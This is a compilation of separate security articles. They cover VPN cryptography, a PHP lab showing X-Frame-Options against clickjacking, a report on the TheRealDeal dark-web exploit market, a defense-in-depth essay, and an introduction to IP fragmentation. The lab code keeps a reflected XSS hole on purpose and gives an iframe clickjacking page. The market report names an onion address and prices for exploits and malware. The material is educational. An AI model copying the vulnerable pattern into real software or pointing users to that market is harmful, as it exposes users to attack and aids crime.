Remote work via VPN is a standard nowadays. A VPN simulates a private (secure) network over a public (insecure) one. The TCP/IP model and encapsulation were presented first. Then it was described how tunneling works. Finally, we have seen how cryptography can be used to make the VPN tunnel secure.

Source
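As an appendix to the article above, the session-key and integrity-check ideas can be sketched with nothing but the Python standard library. This is purely illustrative (real VPNs use vetted protocol implementations), and the asymmetric step of encrypting the session key with B's public key is only indicated in a comment:

import os
import hmac
import hashlib

# A generates a fresh session key for this session (Forward Secrecy comes from
# regenerating it periodically, so older traffic stays safe if a later key leaks).
session_key = os.urandom(32)

# In a real exchange this key would now be encrypted with B's public key
# (asymmetric encryption) before being sent; that step is omitted here.

message = b"datagram to be protected"

# Integrity/authenticity: HMAC over the message with the shared session key.
tag = hmac.new(session_key, message, hashlib.sha256).digest()

def verify(key, msg, received_tag):
    """B recomputes the HMAC and compares it in constant time."""
    return hmac.compare_digest(hmac.new(key, msg, hashlib.sha256).digest(), received_tag)

print(verify(session_key, message, tag))       # True
print(verify(session_key, b"tampered", tag))   # False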
-
In this world of the web, we have seen various common attacks like XSS, Clickjacking, Session Hijacking, etc. Various HTTP headers are introduced to defend against these attacks in a simple and easy fashion. In this series of articles, we will see various headers available to protect against common web attacks and we will also see a practical approach of how to implement them in a simple PHP based application. The focus of this series is to give developers a practical touch of how these common attacks can be prevented just by using some HTTP headers. We will setup a vulnerable application to understand these headers in detail. Setting up the lab: You can download the code snippets and database file used in this application here: You can set up this PHP-MYSQL application in XAMPP or WAMP or LAMP or MAMP, depending upon your machine. In my case, I am using a Mac machine and thus using MAMP, and I kept all the files in a folder called “sample” inside my root directory. Application functionality: After setting up the sample application, launch the home page as shown below. http://localhost/sample/index.php As we can see in the above figure, this application has got a very simple login page where the user can enter his credentials. It has got basic server side validations as explained below. The user input fields cannot be empty. This is done using PHP’s empty() function. So, if a user doesn’t enter anything and clicks login, it throws a message as shown below. If the user enters wrong credentials, it throws a message as shown below. This is done after performing a check against user database. If the user enters correct username and password, it goes ahead and shows the home page for the user logged in. This is done using the MySQLi prepared statement as shown below. $stmt = $mysqli->prepare("select * from admin where username=? and password=?"); $stmt->bind_param("ss",$username,$password); $stmt->execute(); username: admin password: 1q2w3e4r5t Note: Please keep in mind that the given password is stored as SHA1 hash in this sample database. This is a common password and this SHA1 hash can be easily be cracked using some online tools. After logging in, a session is created for the user, and there is a simple form which is vulnerable to XSS. Now, let us fire up BurpSuite and just keep a note of the default headers that are set when we login to this application. This looks as shown below. HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 13:59:23 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=17807aed72952730fd48c35ac8e58f9c; path=/ Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If you clearly observe the above headers, there are no headers added to provide additional security to this application. We can also see the search field after logging in, which is accepting user input and echoing back to the user. Below is the code used to build the page being displayed after login. 
<?php session_start(); session_regenerate_id(); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Clickjacking prevention using X-Frame-Options header: The first concept that we will discuss is Clickjacking mitigation using X-Frame-Options. How does it work? Usually, an attacker loads a vulnerable page into an iframe to perform clickjacking attacks. In our case, we are going to load the user dashboard page into an iframe as shown below. This page appears after successful login. http://localhost/sample/home.php <!DOCTYPE html> <html> <head> <title>iframe</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <iframe src="http://localhost/sample/home.php"></iframe> </body> </html> I saved this page as iframe.html on the same server. When we load this in a browser, the above URL will be loaded in an iframe as shown below. Though there are multiple ways to prevent this, we are going to discuss the X-Frame-Options header to keep the content of this article inline with the title. The X-Frame-Options header can be used with the following three values: DENY: Denies any resource from framing the target. SAMEORIGIN: Allows only resources that are part of the Same Origin Policy to frame the protected resource. ALLOW-FROM: Allows a single serialized-origin to frame the protected resource. This works only with Internet Explorer and Firefox. We will discuss each of these options in detail. X-Frame-Options: DENY Let us start with “X-Frame-Options: DENY”. Open up your home.php file and add the following line. header(“X-Frame-Options: DENY”); Now the modified code should look as shown below. 
<?php session_start(); session_regenerate_id(); header("X-Frame-Options: DENY"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Logout from the application and re-login to observe the HTTP headers now. Below are the HTTP headers from the server after adding X-Frame-options header with the value DENY: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:14:51 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=9190740c224f78bb78998ff40e5247f3; path=/ X-Frame-Options: DENY Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If you notice, there is an extra header added in the response from the server. If we reload the iframe now, the URL will not be loaded inside the iframe. This looks as shown below. Let us see the reason behind this by navigating to Chrome’s developer tools using the following path. Customize and Control Google Chrome -> More Tools -> Developer Tools\ As we can see in the above figure, this is because of the header we set in the server response. We can check the same in Firefox by using the Web Developer Extension as shown below. If we load the iframe.html page in Firefox, below is the error being displayed in the console. X-Frame-Options: SAMEORIGIN There may be scenarios where framing of this URL is required for this application. In such cases, we can allow framing from the same origin and prevent it from cross origin requests using the value “SAMEORIGIN” with X-Frame-Options header.\ Open up your home.php file and add the following line. header(“X-Frame-Options: sameorigin”);\ Now the modified code should look as shown below. 
<?php session_start(); session_regenerate_id(); header("X-Frame-Options: sameorigin"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Logout from the application and re-login to observe the HTTP headers now. Below are the HTTP Headers from the server after adding X-Frame-options header with the value sameorigin: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:34:52 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=5f3d66b05f57d67c3c14158621dbba9e; path=/ X-Frame-Options: sameorigin Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Now, let us see how it works with different origins. First let us load the same iframe.html, which is hosted on the same server. As we can see in the figure below, we are able to load the page in the iframe without any problem. Now, I launched Kali Linux using Virtual Box and loaded this URL(http://localhost/sample/home.php)and placed the file on the server, which is a different origin for our current application. Below is the code snippet used on the Kali Linux machine to create iframe.html. When we launch this iframe.html file, it will not load due to the cross origin restriction by the server. We can see that in the error console of iceweasel browser in Kali Linux as shown below. The error clearly shows that the server does not allow cross-origin framing. X-Frame-Options: ALLOW-FROM http://www.site.com X-Frame-Options: ALLOW_FROM option allows a single serialized-origin to frame the target resource. This works only with Internet Explorer and Firefox. Let us see how this works. First, open up your home.php file and add the following line. header(“X-Frame-Options: ALLOW-FROM http://localhost”); Now the modified code should look as shown below. 
<?php session_start(); session_regenerate_id(); header("X-Frame-Options: ALLOW-FROM http://localhost"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Let us logout from the application and re-login to check if the header is added. HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 02:18:49 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=c8a5b9a76982ae38f0dde3f3bf3480f5; path=/ X-Frame-Options: ALLOW-FROM http://localhost Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 As we can see, the new header is added now. If we now try to load the iframe from the same server, it loads the page without any problem, as shown below. This is because http://localhost is allowed to load this URL. Now, let us try to change the header to something else and try reloading it again. Add the following line in home.php and observe the difference. header(“X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com”); The modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Following are the headers captured from BurpSuite. 
HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 02:20:26 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=6a8686e1ab466a6c528d8a49a281c74e; path=/ X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If we now refresh our previous link, it will not load the page in an iframe. If we observe the error console, it shows the following error. It is obvious that framing by http://localhost is not permitted. Conclusion In this article, we have seen the functionality of our vulnerable application and fixed the clickjacking vulnerability using X-Frame-Options header. We have also seen various options available with this header and how they differ from each other. The next article gives coverage of other security headers available. Source
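As a companion to the Burp captures above, the same before/after header check can be scripted. Here is a small sketch using the third-party requests library; the URL matches the local lab from this article, and the header list mixes the one covered here with a few common companions that later parts of this series may touch on.

import requests

# The lab URL from this article; adjust as needed. home.php expects a logged-in
# session, so a PHPSESSID cookie can be passed via the cookies= argument if required.
URL = "http://localhost/sample/home.php"

CHECKS = ["X-Frame-Options", "Content-Security-Policy",
          "X-Content-Type-Options", "Strict-Transport-Security"]

resp = requests.get(URL, timeout=10)  # e.g. requests.get(URL, cookies={"PHPSESSID": "..."})
for name in CHECKS:
    value = resp.headers.get(name)
    print(name + ":", value if value else "missing")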
-
Introduction Black markets deployed on anonymizing networks such as Tor and I2P offer all kinds of illegal products, including drugs and weapons. They represent a pillar of the criminal ecosystem, as these black markets are the privileged places to acquire illegal goods and services by preserving the anonymity of both sellers and buyers and making it difficult to track payment transactions operated through virtual currencies like Bitcoin. The majority of people ignore that one of the most attractive goods in the underground market are zero-day exploits, malicious codes that could be used by hackers to exploit unknown vulnerabilities in any kind of software. The availability of zero-day exploits is a key element for a successful attack. The majority of state-sponsored attacks that go undetected for years rely on the exploitation of an unknown flaw in popular products on the market and SCADA systems. Zero-day exploits: A precious commodity Security experts have debated on several occasions the importance of the zero-day exploitation to design dangerous software that could target any kind of application. Zero-day exploits are among the most important components of any cyber weapons, and for this reason they are always present in the cyber arsenals of governments. Zero-day exploits could be used by threat actors for sabotage or for cyber espionage purposes, or they could be used to hit a specific category of software (i.e. mobile OSs for surveillance, SCADA application within a critical infrastructure). In some cases, security experts have discovered large scale operations infecting thousands of machines by exploiting zero-day vulnerabilities in common applications (e.g. Java platform, Adobe software). A few days ago, for example, security experts at FireEye detected a new highly targeted attack run by the APT28 hacking crew exploiting two zero-day flaws to compromise an “international government entity.” In this case, the APT28 took advantage of zero-day vulnerabilities in Adobe Flash software (CVE-2015-3043) and a Windows operating system (CVE-2015-1701). Zero-day exploits are commodities in the underground economy. Governments are the primary buyers in the growing zero-day market. Governments aren’t the only buyers however, exploit kits including zero-day are also acquired by non-government actors. In 2013 it was estimated that the market was able to provide 85 exploits per day, a concerning number for the security industry, and the situation today could be worse. It has been estimated that every year, zero-day hunters develop a combined 100 exploits, resulting in 85 privately known exploits, and this estimation does not include the data related to independent groups of hackers, whose activities are little known. Zero-day hunters are independent hackers or security firms that analyze every kind of software searching for a vulnerability. Then this knowledge is offered in black marketplaces to the highest bidder, no matter if it is a private company that will use it against a competitor or a government that wants to use it to target the critical infrastructure of an adversary. A study conducted by the experts at NSS Labs in 2013 titled “The Known Unknowns” reported that every day during a period of observation lasting three years, high-paying buyers had access to at least 60 vulnerabilities targeting common software produced by Adobe, Apple, Microsoft and Oracle. 
“NSS Labs has analyzed ten years of data from two major vulnerability purchase programs, and the results reveal that on any given day over the past three years, privileged groups have had access to at least 58 vulnerabilities targeting Microsoft, Apple, Oracle, or Adobe. Further, it has been found that these vulnerabilities remain private for an average of 151 days. These numbers are considered a minimum estimate of the ‘known unknowns’, as it is unlikely that cyber criminals, brokers, or government agencies will ever share data about their operations. Specialized companies are offering zero-day vulnerabilities for subscription fees that are well within the budget of. A determined attacker (for example, 25 zero-days per year for USD $2.5 million); this has broken the monopoly that nation states historically have held regarding ownership of the latest cyber weapon technology. Jointly, half a dozen boutique exploit providers have the capacity to offer more than 100 exploits per year.” On the black market, a zero-day exploit for a Windows OS sells for up to $250,000 according to BusinessWeek, a good incentive for hackers to focus their efforts in the discovery of this category of vulnerabilities. The price could increase in a significant way if the bugs affect critical systems and the buyer is a government that intends to use it for Information Warfare. What is very concerning is that in many cases, the professionals who discover a zero-day, in order to maximize gains, offer their knowledge to hostile governments who use it also to persecute dissidents or to attack adversary states. The zero-day market follows its own rules, the commodities are highly perishable, the transactions are instantaneous, and the agreement between buyers and sellers is critical. “According to a recent article in The New York Times, firms such as VUPEN (France), ReVuln (Malta), Netragard, Endgame Systems, and Exodus Intelligence (US) advertise that they sell knowledge of security vulnerabilities for cyber espionage. The average price lies between USD $40,000 and USD $160,000. Although some firms restrict their clientele, either based on country of origin or on decisions to sell to specific governments only, the ability to bypass this restriction through proxies seems entirely possible for determinedcyber criminals. Based on service brochures and public reports, these providers can deliver at least 100 exclusive exploits per year,” states the report. In particular, the US contractor Endgame Systems reportedly offers customers 25 exploits a year for $2.5 million. The uncontrolled and unregulated market of zero-day exploits pose a real threat for any industry. For this reason, security experts and government agencies constantly monitor its evolution. The zero-day market in the Deep Web: “TheRealDeal” marketplace Zero-day exploits have been available in several underground Deep Web marketplaces for a long time, and it is not difficult to find malicious codes and exploit kits in different black markets or hacking forums. Recently a new black market dubbed TheRealDeal has appeared in the Deep Web. The platform was designed to provide both sellers and buyers a privileged environment for the commercialization of precious goods. Figure – TheRealDeal Marketplace TheRealDeal (http://trdealmgn4uvm42g.onion) service appeared last month and it is focused on the commercialization of zero-day exploits. 
This singular marketplace is hosted on the popular Tor network to protect the anonymity of the actors involved in the sale of these precious commodities. The market offers zero-day exploits for still-unknown flaws as well as one-day exploits, which target vulnerabilities that have already been published but are modified to be undetectable by defensive software.

Figure – One-day private exploits

The operators also offer one-day private exploits with known CVEs for which the code was never released. They also anticipated that a seller specialized in exploits for the GSM platform will soon offer a listing for some very interesting hardware.

Who is behind TheRealDeal?

The ‘deepdotweb’ website published an interview with one of the administrators of the black market, who explained that the project is operated by four cyber experts with significant experience dealing in the “clearnet when it comes to zero-day exploit code, databases and so on.”

The administrator explained that the greatest risk in commercializing zero-day exploits is that in the majority of cases the code does not work, or the sellers are simply scammers. Another factor that convinced the administrators to launch the TheRealDeal zero-day marketplace is that the places where it is possible to find these precious goods are not always easy to reach: there are IRC servers that are hard to find or that require an invitation. By contrast, TheRealDeal wants to be an ‘open market’ focused on zero-days. The four experts decided to launch the hidden service to create a marketplace where people can trade zero-day exploits without becoming victims of fraud, while staying completely anonymous.

“We started off by using BitWasp, fully aware of its history and flaws, but since we have years of hands-on experience in the security industry and not much in web-design we decided it would be a good platform since we can make our own security assessments and patches while the whole multi-sig seems to work perfect. We also wanted to avoid involving other people in the project for obvious reasons and that was another reason why not to hire a web designer etc… although we might hire one off the darknet soon, just to improve the UI a little,” said one of the administrators.

Below is the list of product categories available on the TheRealDeal marketplace:

0-Day exploits (4)
FUD Exploits (4)
1Day Private Exploits (1)
Information (5)
Money (36)
Source Code (4)
Spam (3)
Accounts (7)
Cards
Other Tools (3)
RATs (1)
Hardware (2)
Drugs
Misc (6)
Pharmacy (12)
Cannabis (5)
LSD (1)
Shrooms (2)
MDMA (6)
Speed (5)
Services (8)
Weapons
Hot (1)
Cold (6)
CNC

Analyzing the product listing of TheRealDeal Market, it is possible to note the availability of zero-day exploits, that is, source code that could be used by hackers in cyber attacks, and of course any kind of hacking tool. The list is still short because the market is in an embryonic stage, but the policy of its operators is clear.

“Welcome… We originally opened this market in order to be a ‘code market’ — where rare information and code can be obtained,” a message from the website’s anonymous administrator reads. “Completely avoid the scam/scum and enjoy the real code, real information and real products.”

Among the products there are a new method of hacking Apple iCloud accounts and exploit kits that could be used to compromise WordPress-based websites as well as mobile and desktop OSs (e.g. Android and Windows).
The price tag for the iCloud hack is $17,000 and, as explained by the seller, it can compromise any account; the buyer can pay in Bitcoin to make identification difficult. “Any account can be accessed with a malicious request from a proxy account,” reads the description of the hack on the TheRealDeal marketplace. “Please arrange a demonstration using my service listing to hack an account of your choice.”

Figure – Zero-day exploits

The listing also includes an Internet Explorer attack that is offered for $8,000 in Bitcoin, as reported by Wired in a blog post: “Others include a technique to hack WordPress’ multisite configuration, an exploit against Android’s Webview stock browser, and an Internet Explorer attack that claims to work on Windows XP, Windows Vista and Windows 7, available for around $8,000 in bitcoin … Found 2 months ago by fuzzing,” the seller writes, referring to an automated method of testing a program against random samples of junk data to see when it crashes. “0day but might be exposed, can’t really tell without risking a lot of money,” the seller adds. “Willing to show a demo via the usual ways, message me but don’t waste my time!”

The list of products has recently been updated. It now also includes an exploit for the MS15-034 Microsoft IIS remote code execution vulnerability, a flaw that is being actively exploited in the wild against Windows 7, 8, and 8.1, Windows Server 2008 R2, 2012, and 2012 R2.

TheRealDeal market also offers other products very common in the criminal ecosystem, including drugs, weapons, and Remote Access Trojans (RATs). The operators also created a specific “services” category with the intent of attracting high-profile black hats offering their hacking services (e.g. email account takeover, DDoS services, data theft, hacking campaigns). The Information category was created for sellers offering any kind of information: documents, databases, secret keys, and similar products.

TheRealDeal doesn’t implement a real escrow model; instead it adopts a multi-signature model to make financial transactions effective. Basically, the buyer, the seller and the administrators jointly control the amount of Bitcoin to be transferred, and any transaction needs the signatures of two out of the three parties before funds are moved. The administrators decided to implement multisig transactions because their marketplace is very young and has no reputation yet, which means people have no incentive to deposit a sum of money for something they are not able to verify.

It is curious to note that the marketplace also offers drugs due to high demand, although according to the administrators they might consider removing them in the future. In their own words: “There is also a ‘services’ category – anything can go there, but we are hoping for some high quality blackhats to come forward and offer their services, anything from obtaining access to an email and getting a certain document and up to long term campaigns. The hardware category is for toys like fake cellular base stations and other physical ‘hacking’ tools. The information category is for any kind of information, documents, databases, secret keys, etc.”

In the following table are the principal product categories offered in the market and their prices.
Category: 0-Day exploits
Apple ID / iCloud remote exploit: USD 17025,52
Internet Explorer <= 11: USD 7840,70
Android WebView 0day RCE: USD 8176,73
WordPress MU RCE: USD 1008,09

Category: FUD Exploits
FUD .js download and execute: USD 291,23
Adobe Flash < 16.0.0.296 (CVE-2015-0313): USD 560,05
Adobe Flash < 16.0.0.287 (CVE-2015-0311): USD 560,05

Category: 1Day Private Exploits
MS15-034 Microsoft IIS Remote: USD 42313,18

Category: Hardware
A5/1 Encryption Rainbow Tables: USD 67,21

Category: Source Code
Banking malware source code: USD 2,11
Alina POS malware full source code: USD 0,92
Exploit Kits Source Code: USD 1,82
“Start your own maket” code and server: USD 7959,43

I’ll keep you updated on the evolution of the TheRealDeal marketplace in the coming weeks.

References

http://securityaffairs.co/wordpress/36098/cyber-crime/therealdeal-black-marketplace-exploits.html
http://www.wired.com/2015/04/therealdeal-zero-day-exploits/
http://securityaffairs.co/wordpress/14561/malware/zero-day-market-governments-main-buyers.html
https://www.nsslabs.com/reports/known-unknowns-0
http://www.deepdotweb.com/2015/04/08/therealdeal-dark-net-market-for-code-0days-exploits/

Source
-
Defense in depth is dead. The way you’re thinking about data center security is outdated. Security started changing long before Sony, Target and the others got hacked. The problem starts with your perimeter.

During a conversation with Pete Lindstrom of IDC, we paused to consider the state of defense in depth. “Circling wagons is just impossible,” Pete said. “With apps strewn across the internet, if a corporation thinks they can build perimeter around all their apps then they are nuts.”

By expanding the definition of cloud computing to include cloud-based accounting, CRM, email services, and development tools, people discover that their organizations have been using the cloud for years without fully realizing it. In 2014, IDC reported that 69% of enterprises worldwide have at least one application or a portion of their computing infrastructure in the cloud. In Europe, adoption is also growing, but at a slightly slower rate: 19% of EU enterprises used cloud computing in 2014, according to the European Union‘s Eurostat. Bottom line: more enterprise data is living outside of the protected data center.

When your definition of defense in depth is adding layers of security to the data center perimeter and physical data segmentation, modern cloud applications are indeed insecure. Instead, the enterprise should treat the application, the data, and the user as the important security layers. In a 2015 report from Accenture and the Ponemon Institute, the authors note that proactive organizations prioritize network traffic anomalies, identifying vulnerabilities and limiting unauthorized data sharing, while the “static” companies focus on employees’ device security and data backup.

Let’s examine the Sony Pictures hack. The Sony hackers gained access through former employees’ accounts and easily cracked the perimeter. The real damage occurred once they exploited the weak internal network security: all the critical applications – email servers, accounting data, and copyrighted motion pictures – were connected “on a wire” inside the corporate network. The perimeter-heavy, fortify-the-exterior approach to security is indeed dead. In fact, when it fails to stop cybercrime, this strategy can cost you upwards of $100M.

Each enterprise application should be considered critical and deserves its own perimeter inside any network environment. With Sony, or any organization, critical data means all data. For a manufacturer, critical data might be product designs as well as the obvious accounting and customer data. Moreover, nearly 85% of insider or “privilege misuse” attacks used the target enterprise’s corporate local area network (LAN), according to a 2014 Verizon security report.

To truly guard and protect an application, enterprises need to control all data and network traffic via secure, encrypted switches at every layer within a network. Defense shouldn’t end at the data center perimeter, but extend down to each individual application. Monitored access, encryption, and application-specific firewall rules can all but eliminate malicious “east/west” movement inside a network.

This approach to application-specific defense in depth extends the concept of physical segmentation into “application segmentation.” Each application owner within an organization can dictate how traffic flows to each application server through an encrypted network switch. When data passes through a secure application perimeter, application owners can easily monitor and isolate traffic and prevent unauthorized access.
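To make the idea of application segmentation concrete, here is a toy Python sketch; all application names, ports and flows are hypothetical, and a real deployment would enforce this in switches or firewalls rather than in application code. The point it illustrates is default-deny: only flows an application owner has explicitly allowed may cross that application's own perimeter, including "east/west" traffic between internal systems.

# Toy model of per-application segmentation: each application keeps its own
# allow-list of (source application, destination port) pairs. Anything not
# listed is denied, even if both endpoints sit inside the corporate network.
ALLOWED_FLOWS = {
    "email":      {("web-frontend", 587)},
    "accounting": {("email", 443)},
    # an application with no entry accepts no inbound flows at all
}

def flow_allowed(src_app: str, dst_app: str, dst_port: int) -> bool:
    """Default-deny check applied at each application's own perimeter."""
    return (src_app, dst_port) in ALLOWED_FLOWS.get(dst_app, set())

# A compromised email server probing the accounting database port is blocked,
# while the explicitly whitelisted mail-submission flow is still permitted.
print(flow_allowed("email", "accounting", 3306))   # False
print(flow_allowed("web-frontend", "email", 587))  # True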
Even with only basic interior firewall rules of this kind, an enterprise can protect itself from a Sony-style data exploit. Source
-
1. Introduction

The process of IP fragmentation occurs when the data of the network layer is too large to be transmitted over the data link layer in one piece. The network-layer data is then split into several pieces (fragments), and this process is called IP fragmentation. The intention of this article is to present how IP fragmentation can be used by an attacker to bypass packet filters (the IP fragmentation overlapping attack). Finally, it is shown how this attack can be prevented by stateful inspection.

2. Understanding IP fragmentation

Two layers of the OSI model are especially interesting when IP fragmentation is discussed: layer 3 (network) and layer 2 (data link). The data unit of the network layer is called a datagram and the data unit of the data link layer is called a frame. From the data flow perspective, the datagram is included in the frame (encapsulation) and sent to the receiver via the physical medium in the form of ones and zeros (physical layer – layer 1 of the OSI model).

It may happen that the data of the network layer is too large to be sent over the data link layer in one piece. Then it needs to be fragmented. How much data can be sent in one frame? That is defined by the MTU (Maximum Transmission Unit); for example, the MTU is 1500 bytes for Ethernet, which is commonly used at the data link layer.

Let’s describe how IP fragmentation actually works. We need some indication that the fragments belong to a specific datagram (keep in mind that these fragments need to be reassembled later by the receiver). For this purpose the identification field is used: the same value is set in all fragments that are created as a result of the datagram’s fragmentation. These fragments need to be reassembled into the original datagram, but in what order? The fragment offset is used for this purpose. How does the receiver know the number of fragments? Here the MF (More Fragments) flag is used: when the MF flag is set, the system knows that another fragment is expected; the last fragment is the one without the MF flag.

To summarize: the sender chooses a datagram size that is not greater than the MTU of the attached network medium, and the process of IP fragmentation is delegated to the routers, which connect different network media with different MTUs.

There is also another approach to IP fragmentation – Path MTU Discovery. The idea is that the sender sends a probe datagram with the DF (Don’t Fragment) flag set. If a router receives this probe datagram and sees that it is larger than the MTU of the attached network medium, a problem occurs: the router would have to fragment it, but the probe datagram is marked not to be fragmented. A message about this problem is then sent back to the sender, who interprets the answer and knows that the datagram needs to be smaller to avoid fragmentation on the way to the receiver. The sender wants to find out how large the datagram can be without being fragmented by the routers; that’s why this process is called Path MTU Discovery, and fragmentation in this approach is delegated to the sender. The problem with this approach is that the probe datagram might have been sent via a different route than the following datagrams. As a consequence, it may turn out that the smallest MTU discovered by the sender is actually not the smallest one on the path of the next datagrams, and fragmentation by routers will still be needed.
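To make the fields involved concrete, here is a minimal sketch using Scapy, a third-party Python packet-crafting library; the address and payload are hypothetical, and the snippet only illustrates the identification, offset and MF values described above.

from scapy.all import IP, UDP, fragment, raw

# Hypothetical destination; the payload is deliberately larger than a 1500-byte MTU.
datagram = IP(dst="192.0.2.10") / UDP(sport=1024, dport=80) / ("A" * 3000)

# Let Scapy split the datagram into fragments that fit the MTU.
for frag in fragment(datagram, fragsize=1480):
    # Every fragment carries the same identification value; the offset is counted
    # in 8-byte units, and the MF flag is set on all fragments except the last one.
    print(frag.id, frag.frag, frag.flags, len(raw(frag)))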
